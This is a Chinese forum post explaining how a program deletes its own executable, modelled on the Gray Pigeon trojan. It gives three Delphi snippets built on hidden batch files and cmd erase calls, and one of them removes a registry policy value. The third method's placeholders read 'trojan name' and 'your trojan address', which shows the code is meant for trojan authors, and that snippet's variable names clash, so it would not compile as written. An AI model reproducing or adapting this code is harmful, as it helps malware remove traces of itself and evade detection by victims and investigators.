模仿鸽子实现自删除
现在很多程序都有自删除的功能，那它们是怎么实现的呢？
文章来源: 破晓技术论坛
作者:king
方法一:
unit zishan;
interface
uses
windows;
procedure killme;
implementation
function DeleteFile(const FileName: string): Boolean;
// Thin wrapper over the platform's delete call. Returns True when the file
// was removed; on Windows this shadows Windows.DeleteFile, on Linux it uses unlink.
var
  Path: PChar;
begin
  Path := PChar(FileName);
{$IFDEF MSWINDOWS}
  Result := Windows.DeleteFile(Path);
{$ENDIF}
{$IFDEF LINUX}
  Result := unlink(Path) <> -1;
{$ENDIF}
end;
function OpenKey123(Root: HKEY; StrPath: PChar): HKEY;
// Opens Root\StrPath with KEY_ALL_ACCESS and returns the handle.
// The RegOpenKeyEx return code is not examined: when the open fails the
// result keeps its initial value 0, which callers receive as if it were a handle.
begin
  Result := 0;
  RegOpenKeyEx(Root, StrPath, 0, KEY_ALL_ACCESS, Result);
end;
procedure DelValue(Root: HKEY; StrPath: PChar; StrValue: PChar);
// Deletes the value StrValue under Root\StrPath and closes the key.
// Registry errors are not checked at any step: if the open fails, the
// delete and close are attempted on handle 0 and simply fail silently.
var
  KeyHandle: HKEY;
begin
  KeyHandle := 0;
  RegOpenKeyEx(Root, StrPath, 0, KEY_ALL_ACCESS, KeyHandle);
  RegDeleteValue(KeyHandle, StrValue);
  RegCloseKey(KeyHandle);
end;
function Gesy: string;
// Returns the Windows system directory, always terminated with a backslash.
var
  Buffer: array[0..255] of Char;
begin
  GetSystemDirectory(Buffer, 255);
  Result := Buffer;
  // GetSystemDirectory does not normally include a trailing separator;
  // append one unless the last character already is a backslash.
  if (Result = '') or (Result[Length(Result)] <> '\') then
    Result := Result + '\';
end;
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
// Applies the attribute mask Attr to FileName.
// Returns 0 on success, otherwise the Win32 error code from GetLastError.
begin
  if SetFileAttributes(PChar(FileName), Attr) then
    Result := 0
  else
    Result := GetLastError;
end;
//自删除
// Self-delete routine. Removes one registry policy value, drops a batch file
// into the system directory that keeps deleting this executable until it is
// gone, launches that batch hidden, and returns without waiting. The retry
// loop in the batch exists because the running image cannot be removed until
// this process has exited; presumably the caller exits shortly after.
procedure killme;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
// Deletes the NoRealMode value under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp.
// DelValue checks no return codes, so this is best-effort; why the value is
// removed is not explained on this page.
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
// Artifact left on disk while the routine runs: <system directory>\Deleteme.bat
// (Gesy returns the system directory with a trailing backslash).
BatchFileName := Gesy + 'Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
// Batch body: delete this executable (ParamStr(0)), jump back while it still
// exists, then delete the batch file itself via %0.
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
// Start the batch with no visible window and at idle priority.
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
// Handles are released immediately; killme does not wait for the child.
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
end.
方法二:
//超快速
// Second variant: a child cmd.exe does the deleting. "erase /F" receives this
// process's full command line (GetCommandLine: the program path plus any
// arguments it was started with) as its argument; window mode 0 keeps cmd hidden.
WinExec(Pchar('cmd /c erase /F ' + GetCommandLine),0);
// Exit at once so the executable is no longer in use when cmd.exe reaches the erase.
ExitProcess(0);
方法三:
// Third variant: write a two-line batch file in the current directory, then
// start a program with a hidden window.
var del:textfile;
begin
// NOTE: the snippet refers to the text file as both `t` and `del`; only `del` is declared.
assignfile(t,'del.bat');
rewrite(del);
// Batch contents: delete the named file (placeholder text on this page),
// then delete the batch file itself via %0.
writeln(t,'del 木马名');
writeln(t,'del %0');
closefile(del);
// Launches the given path (placeholder text on this page) with SW_HIDE.
winexec(pchar('你的木马地址'),sw_hide);
end;
那啥……一般自删除最常用的是第三种方法。